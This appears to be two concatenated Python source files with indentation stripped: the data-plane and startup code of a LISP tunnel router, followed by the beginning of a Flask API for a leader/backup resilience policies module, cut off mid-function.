# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_fix_rloc_encap_state_entry(mc, parms))
if (mc.source_cache == None): return(True, parms)
#
# There is (source, group) state so walk all sources for this group
# entry.
#
mc.source_cache.walk_cache(lisp_fix_rloc_encap_state_entry, parms)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state
#
# Walk map-cache looking for supplied RLOC and change its encap-port to
# the supplied port passed to this function.
#
def lisp_fix_rloc_encap_state(sockets, hostname, rloc, port):
lisp.lisp_map_cache.walk_cache(lisp_fix_rloc_encap_state_walk,
[sockets, rloc, port, hostname])
return
#enddef
#
# lisp_rtr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_rtr_data_plane(lisp_packet, thread_name):
global lisp_send_sockets, lisp_ephem_prot, lisp_data_packet
global lisp_raw_socket, lisp_raw_v6_socket
packet = lisp_packet
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
orig_pkt = packet.packet
pkt = orig_pkt
pkt, source, port, ttl = lisp.lisp_is_rloc_probe(pkt, -1)
if (orig_pkt != pkt):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, pkt, source, port, ttl)
return
#endif
#
# First check if we are assembling IPv4 fragments.
#
packet.packet = lisp.lisp_reassemble(packet.packet)
if (packet.packet == None): return
#
# We need to cache the input encapsualted packet as well as the output
# encapsulated packet.
#
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
if (packet.decode(True, None, lisp.lisp_decap_stats) == None): return
#
# Print some useful header fields and strip outer headers..
#
packet.print_packet("Receive-({})".format(thread_name), True)
#
# Strip outer headers and start inner header forwarding logic.
#
packet.strip_outer_headers()
#
# If instance-id is 0xffffff, this is a Info-Request packet encapsulated
# to port 4341. We need to store the source port and source RLOC for
# NAT-traversal reasons.
#
# We don't need to send an Info-Reply from the 4341 data port. There is no
# information the xTR needs. It has the translated address from the
# map-server, and the NAT is ready for packets from port 4341 since we
# received this Info-Request.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
header = lisp.lisp_control_header()
header.decode(packet.packet)
if (header.is_info_request()):
info = lisp.lisp_info()
info.decode(packet.packet)
info.print_info()
#
# Store/refresh NAT state and Fix map-cache entries if there was
# a change.
#
h = info.hostname if (info.hostname != None) else ""
s = packet.outer_source
p = packet.udp_sport
if (lisp.lisp_store_nat_info(h, s, p)):
lisp_fix_rloc_encap_state(lisp_send_sockets, h, s, p)
#endif
else:
source = packet.outer_source.print_address_no_iid()
ttl = packet.outer_ttl
packet = packet.packet
if (lisp.lisp_is_rloc_probe_request(packet[28]) == False and
lisp.lisp_is_rloc_probe_reply(packet[28]) == False): ttl = -1
packet = packet[28::]
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, 0, ttl)
#endif
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Process inner header (checksum and decrement ttl).
#
if (packet.inner_dest.is_mac()):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_VXLAN_DATA_PORT
elif (packet.inner_version == 4):
packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Process decap node trace function.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, "decap") == False): return
packet.outer_source.afi = lisp.LISP_AFI_NONE
packet.outer_dest.afi = lisp.LISP_AFI_NONE
#endif
#
# Do map-cache lookup. If no entry found, send Map-Request.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
#
# Check if we are doing secondary-instance-ids only when we have a
# map-cache entry in the IID that is possibly a non-LISP site.
#
if (mc and (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION or
mc.eid.address == 0)):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db and db.secondary_iid):
dest_eid = packet.inner_dest
dest_eid.instance_id = db.secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
#endif
#endif
#
# Map-cache lookup miss.
#
if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
if (lisp.lisp_rate_limit_map_request(packet.inner_source,
packet.inner_dest)): return
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
if (packet.is_trace()): lisp.lisp_trace_append(packet)
return
#endif
#
# Send Map-Request to see if there is a RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.is_active() and mc.has_ttl_elapsed()):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#
# Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
# rloc().
#
mc.stats.increment(len(packet.packet))
#
# Encapsulate or native forward packet.
#
dest_rloc, dest_port, nonce, action, rle = mc.select_rloc(packet, None)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()): lisp.lisp_trace_append(packet)
return
#endif
lisp.dprint("No reachable RLOCs found")
if (packet.is_trace()): lisp.lisp_trace_append(packet)
return
#endif
if (dest_rloc and dest_rloc.is_null()):
lisp.dprint("Drop action RLOC found")
if (packet.is_trace()): lisp.lisp_trace_append(packet)
return
#endif
#
# Setup outer header for either unicast or multicast transmission..
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.encap_port = dest_port
if (dest_port == 0): packet.encap_port = lisp.LISP_DATA_PORT
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet) == False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
# Do replication of RLE is returned.
#
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
packet.outer_dest.copy_address(node.address)
packet.encap_port = lisp.LISP_DATA_PORT if \
node.translated_port == 0 else node.translated_port
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet) == False): return
#endif
if (packet.encode(None) == None): return
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
return
#enddef
#
# lisp_rtr_worker_thread
#
# This function runs for each thread started.
#
def lisp_rtr_worker_thread(lisp_thread):
lisp.lisp_set_exception()
while (True):
#
# Dequeue packet from pcap's enqueue.
#
packet = lisp_thread.input_queue.get()
#
# Count input packets and bytes.
#
lisp_thread.input_stats.increment(len(packet))
#
# Use pre-defined packet data structure, store packet buffer in it.
#
lisp_thread.lisp_packet.packet = packet
#
# Decap and encap, go, go, go.
#
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endwhile
return
#enddef
#
# lisp_triage
#
# Decide which RTR thread should process packet. Do a modulus on the timestamp
# to randomly have a single thread process a received packet.
#
def lisp_triage(thread):
seed = (time.time() % thread.number_of_pcap_threads)
return(int(seed) == thread.thread_number)
#enddef
#
# lisp_rtr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop(). IPC it to ourselves so
# main thread can get access to lisp.lisp_map_cache.
#
def lisp_rtr_pcap_process_packet(parms, not_used, packet):
if (lisp_triage(parms[1]) == False): return
device = parms[0]
lisp_thread = parms[1]
use_workers = lisp_thread.number_of_worker_threads
lisp_thread.input_stats.increment(len(packet))
#
# Jump over MAC header if packet received on interface. There is a 4-byte
# internal header in any case (loopback interfaces will have a 4 byte
# header)..
#
offset = 4 if device == "lo0" else (14 if lisp.lisp_is_macos() else 16)
packet = packet[offset::]
#
# If we are using worker threads, queue packet so they can process packet.
#
if (use_workers):
index = lisp_thread.input_stats.packet_count % use_workers
index = index + (len(lisp_threads) - use_workers)
thread = lisp_threads[index]
thread.input_queue.put(packet)
else:
lisp_thread.lisp_packet.packet = packet
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endif
return
#enddef
#
# lisp_rtr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_rtr_pcap_thread(lisp_thread):
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 9000, 0, 100)
pfilter = "(dst host "
afilter = ""
for addr in lisp.lisp_get_all_addresses():
pfilter += "{} or ".format(addr)
afilter += "{} or ".format(addr)
#endif
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0))))"
#
# For RLOC-probe messages that come via pcap interface so we have the
# IP header to grab the TTL.
#
afilter = afilter[0:-4]
pfilter += (" or (not (src host {}) and " + \
"((udp src port 4342 and ip[28] == 0x28) or " + \
"(udp dst port 4342 and ip[28] == 0x12)))").format(afilter)
lisp.lprint("Capturing packets for: '{}'".format(pfilter))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_rtr_pcap_process_packet, [device, lisp_thread])
return
#enddef
#
# lisp_rtr_process_timer
#
# Call general timeout routine to process the RTR map-cache.
#
def lisp_rtr_process_timer():
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in lisp.lisp_crypto_keys_by_nonce.values():
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce = {}
#
# Walk map-cache.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_rtr_startup
#
# Intialize this LISP RTR process. This function returns no values.
#
def lisp_rtr_startup():
global lisp_ipc_listen_socket, lisp_send_sockets, lisp_ephem_listen_socket
global lisp_raw_socket, lisp_raw_v6_socket, lisp_threads
global lisp_ipc_punt_socket
lisp.lisp_i_am("rtr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("RTR starting up")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Open network send socket and internal listen socket. For an RTR, that
# may be behind a NAT, all Map-Requests are sent with the ephemeral port
# so the Map-Request port and the ECM port will be the same.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-rtr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[0] = lisp_ephem_listen_socket
# lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3 modulo.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
pcap_threads = os.getenv("LISP_PCAP_THREADS")
pcap_threads = 1 if (pcap_threads == None) else int(pcap_threads)
worker_threads = os.getenv("LISP_WORKER_THREADS")
worker_threads = 0 if (worker_threads == None) else int(worker_threads)
#
# Setup packet capture.
#
for i in range(pcap_threads):
t = lisp.lisp_thread("pcap-{}".format(i))
t.thread_number = i
t.number_of_pcap_threads = pcap_threads
t.number_of_worker_threads = worker_threads
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_pcap_thread, args=[t]).start()
#endif
#
# Start worker threads. If you want to change the number of them, only
# this constant needs changing.
#
for i in range(worker_threads):
t = lisp.lisp_thread("worker-{}".format(i))
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_worker_thread, args=[t]).start()
#endfor
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
lisp_periodic_timer.start()
return(True)
#enddef
#
# lisp_rtr_shutdown
#
# Shut down this process.
#
def lisp_rtr_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-rtr")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
lisp_raw_socket.close()
return
#enddef
#
# lisp_rtr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_rtr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
return
#enddef
#
# lisp_rtr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_rtr_xtr_command(kv_pair):
global lisp_ephem_listen_socket, lisp_raw_socket, lisp_ephem_port
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Trigger if "rloc-probing = yes" just happened and it was previously
# set to "no".
#
if (rloc_probing == False and lisp.lisp_rloc_probing):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket,
None, lisp_raw_socket]
lisp.lisp_start_rloc_probe_timer(1, lisp_sockets)
entry = { "type" : "itr-crypto-port", "port" : lisp_ephem_port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# RTR commands processed by this process.
#
lisp_rtr_commands = {
"lisp xtr-parameters" : [lisp_rtr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp map-resolver" : [lisp_rtr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp rtr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp database-mapping" : [lisp_rtr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"show rtr-rloc-probing" : [lisp_rtr_show_rloc_probe_command, { }],
"show rtr-keys" : [lisp_rtr_show_keys_command, {}],
"show rtr-map-cache" : [lisp_rtr_show_command, {}],
"show rtr-map-cache-dns" : [lisp_rtr_show_command_dns, {}]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_rtr_startup() == False):
lisp.lprint("lisp_rtr_startup() failed")
lisp.lisp_print_banner("RTR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ipc_punt_socket]
ephem_sockets = [lisp_ephem_listen_socket] * 3
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket..
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-rtr", [lisp_rtr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-rtr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_rtr_data_plane(packet, "")
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_rtr_shutdown()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
main.py | #!/usr/bin/env python3
"""
RESOURCE MANAGEMENT - POLICIES MODULE
Sub-Modules:
- Agent Start [AS]
- Leader Protection [LP]
- Area Resilience [AR]
- Leader Reelection [LR]
"""
from common.logs import LOG
from common.common import CPARAMS, URLS
from logging import DEBUG, INFO
from leaderprotection.arearesilience import AreaResilience
from agentstart.agentstart import AgentStart
from leaderprotection.leaderreelection import LeaderReelection
from policies.policiesdistribution import PoliciesDistribution
from lightdiscovery.lightdiscovery import LightDiscovery
from flask import Flask, request
from flask_restplus import Api, Resource, fields
from threading import Thread
from time import sleep
import requests
__status__ = 'Production'
__maintainer__ = 'Alejandro Jurnet'
__email__ = 'ajurnet@ac.upc.edu'
__version__ = 'b2.4.1'
__author__ = 'Universitat Politècnica de Catalunya'
# ### Global Variables ### #
arearesilience = AreaResilience()
agentstart = AgentStart()
policiesdistribution = PoliciesDistribution()
lightdiscovery = LightDiscovery('', '')
# ### main.py code ### #
# Set Logger
if CPARAMS.DEBUG_FLAG:
LOG.setLevel(DEBUG)
else:
LOG.setLevel(INFO)
LOG.info('Policies Module. Version {} Status {}'.format(__version__,__status__))
# Print env variables
LOG.debug('Environment Variables: {}'.format(CPARAMS.get_all()))
# Prepare Server
app = Flask(__name__)
app.url_map.strict_slashes = False
api = Api(app, version=__version__, title='Control Resilience Management Module - {}'.format(CPARAMS.DEVICEID_FLAG), description='API')
pl = api.namespace('crm-api', description='CRM Operations')
rm = api.namespace('rm', description='Resource Manager Operations')
ld = api.namespace('ld', description='Light Discovery Operations')
reelection_model = api.model('Reelection_msg', {
'deviceID': fields.String(required=True, description='The deviceID of the device that is promoted as new leader.')
})
keepalive_model = api.model('Keepalive Message', {
'deviceID': fields.String(required=True, description='The deviceID of the device that is sending the message.')
})
keepalive_reply_model = api.model('Keepalive Reply Message', {
'deviceID': fields.String(required=True, description='The deviceID of the device that is replying the message.'),
'backupPriority': fields.Integer(required=True, description='Order of the backup in the area.'),
'controlInformation': fields.String(required=False, description='Control Data Replication payload.')
})
leader_info_model = api.model('Leader Info Message', {
'imLeader': fields.Boolean(required=True, description='If the actual role is Leader'),
'imBackup': fields.Boolean(required=True, description='If the actual role is Backup')
})
components_info_model = api.model('Resource Manager Components Information', {
"started": fields.Boolean(description='The agent is started'),
"running": fields.Boolean(description='The agent is currently running'),
"modules": fields.List(fields.String, description='List of modules that are triggered on starting'),
"discovery": fields.Boolean(description='Discovery module is started'),
"identification": fields.Boolean(description='Identification module is started'),
"cau_client": fields.Boolean(description='CAUClient module is started'),
"categorization": fields.Boolean(description='Categorization module is started'),
"policies": fields.Boolean(description='Policies module is started'),
"discovery_description": fields.String(description='Discovery module description / parameters received'),
"identification_description": fields.String(description='Identification module description / parameters received'),
"categorization_description": fields.String(description='Categorization module description / parameters received'),
"policies_description": fields.String(description='Policies module description / parameters received'),
"cau_client_description": fields.String(description='CAUClient module description / parameters received')
})
policies_distr_model = api.model('Policies',{
"LMR": fields.String(description='Leader Mandatory Requirements policies in JSON format.'),
"LDR": fields.String(description='Leader Discretionary Requirements in JSON format.'),
"PLSP": fields.String(description='Passive Leader Selection Policies in JSON format.'),
"ALSP": fields.String(description='Automatic Leader Selection Policies in JSON format.'),
"LPP": fields.String(description='Leader Protection Policies in JSON format.'),
"LRP": fields.String(description='Leader Reelection Policies in JSON format.'),
"DP": fields.String(description='Distribution Policies in JSON format.')
})
beacon_reply_model = api.model('Beacon Reply',{
"deviceID": fields.String(required=True, description='ID of the Agent'),
"deviceIP": fields.String(required=True, description='IP of the Agent'),
"cpu_cores": fields.Integer(required=True, description='Number of Logical Cores of Device'),
"mem_avail": fields.Float(required=True, description='Virtual Memory Available'),
"stg_avail": fields.Float(required=True, description='Device Total Storage Available'),
})
# API Endpoints
# #### Resource Manager #### #
@rm.route('/components')
class ResourceManagerStatus(Resource):
"""Resource Manager components status"""
@rm.doc('get_components')
@rm.marshal_with(components_info_model)
@rm.response(200, 'Components Information')
def get(self):
"""Get resource manager module start status"""
payload = {
'started': agentstart.isStarted,
'running': agentstart._connected, # TODO: Private variable exposed here (soft)
'modules': ['discovery', 'identification', 'cau_client', 'categorization', 'policies'],
'discovery': not agentstart.discovery_failed if agentstart.discovery_failed is not None else False,
'identification': not agentstart.identification_failed if agentstart.identification_failed is not None else False,
'cau_client': not agentstart.cauclient_failed if agentstart.cauclient_failed is not None else False,
'categorization': not agentstart.categorization_failed if agentstart.categorization_failed is not None else False,
'policies': not agentstart.policies_failed if agentstart.policies_failed is not None else False
}
# if fcjp.isLeader: # I'm a leader #TODO; Decide if there is any distinction if leader
payload.update({'discovery_description': 'detectedLeaderID: \"{}\", MACaddr: \"{}\"'.format(
agentstart.detectedLeaderID, agentstart.MACaddr) if payload.get(
'discovery') else 'Discovery not started or error on trigger.'})
payload.update({'identification_description': 'IDKey: \"{}\", deviceID: \"{}\"'.format(agentstart.IDkey,
agentstart.deviceID) if payload.get(
'identification') else 'Identification not started or error on trigger.'})
payload.update(
{'categorization_description': 'Started: {}'.format(agentstart.categorization_started) if payload.get(
'categorization') else 'RCategorization not started or error on trigger.'})
payload.update({'policies_description': 'LPP: {}'.format(agentstart.arearesilience_started) if payload.get(
'policies') else 'Policies (LPP) not started or error on trigger.'})
payload.update(
{'cau_client_description': 'authenticated: {}, secureConnection: {}'.format(agentstart.isAuthenticated,
agentstart.secureConnection) if payload.get(
'cau_client') else 'CAU_client not started or error on trigger.'})
# else:
# payload.update({'discovery_description': '' if payload.get('discovery') else ''})
# payload.update({'identification_description': '' if payload.get('identification') else ''})
# payload.update({'categorization_description': '' if payload.get('categorization') else ''})
# payload.update({'policies_description': '' if payload.get('policies') else ''})
return payload, 200
# #### Policies Module #### #
@pl.route(URLS.END_START_FLOW) # Start Agent
class startAgent(Resource):
"""Start Agent"""
@pl.doc('get_startAgent')
@pl.response(200, 'Started')
@pl.response(403, 'Already Started')
def get(self):
"""Start Agent"""
started = agentstart.start(CPARAMS.LEADER_FLAG)
if started:
return {'started': started}, 200
else:
return {'started': True}, 403
@pl.route(URLS.END_POLICIES) # Area Resilience
class startAR(Resource):
"""Start Area Resilience"""
@pl.doc('get_startAR')
@pl.response(200, 'Started')
@pl.response(403, 'Already Started')
def get(self):
"""Start Agent Resilience"""
started = arearesilience.start(agentstart.deviceID)
# started = arearesilience.start(CPARAMS.DEVICEID_FLAG)
if started:
return {'started': started}, 200
else:
return {'started': True}, 403
# noinspection PyUnresolvedReferences
@pl.route('/roleChange/<string:role>') # TODO: Parametrized Endpoint
@pl.param('role', 'The requested role to change.')
class role_change(Resource):
"""Promotion/Demotion of the agent role."""
@pl.doc('get_change')
@pl.response(200, 'Successful')
@pl.response(403, 'Not Successful')
@pl.response(404, 'Role not found')
def get(self, role):
global arearesilience
"""Promotion/Demotion of the agent role."""
imLeader = arearesilience.imLeader()
imBackup = arearesilience.imBackup()
if role.lower() == 'leader':
# Do you want to be a leader?
if imLeader:
# If a leader is promoted to leader, it becomes a super-leader?
LOG.debug('Role change: Leader -> Leader')
return {'imLeader': imLeader, 'imBackup': imBackup}, 403
elif imBackup:
# Hi, I'm backup-kun - It's my time to shine!!
LOG.debug('Role change: Backup -> Leader')
# ret = agentstart.switch(imLeader=True)
lightdiscovery.stopScanning()
ret = lightdiscovery.startBeaconning()
if ret:
LOG.info('Successful promotion to Leader')
else:
LOG.warning('Unsuccessful promotion from Backup to Leader')
return {'imLeader': True, 'imBackup': False}, 200
else:
# Nor leader, nor Backup, just a normal agent
# For reelection, first you must be a backup!
LOG.debug('Role change: Agent -> Leader')
return {'imLeader': imLeader, 'imBackup': imBackup}, 403
elif role.lower() == 'backup':
# Always have a B plan
if imLeader:
# Why in the hell a Leader'll become a backup?
LOG.debug('Role change: Leader -> Backup')
return {'imLeader': imLeader, 'imBackup': imBackup}, 403
elif imBackup:
# Emm... no pls.
LOG.debug('Role change: Backup -> Backup')
return {'imLeader': imLeader, 'imBackup': imBackup}, 403
else:
# Can you watch my shoulder?
LOG.debug('Role change: Agent -> Backup')
leaderIP = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
LOG.debug('Leader at {} is selecting me as Backup'.format(leaderIP))
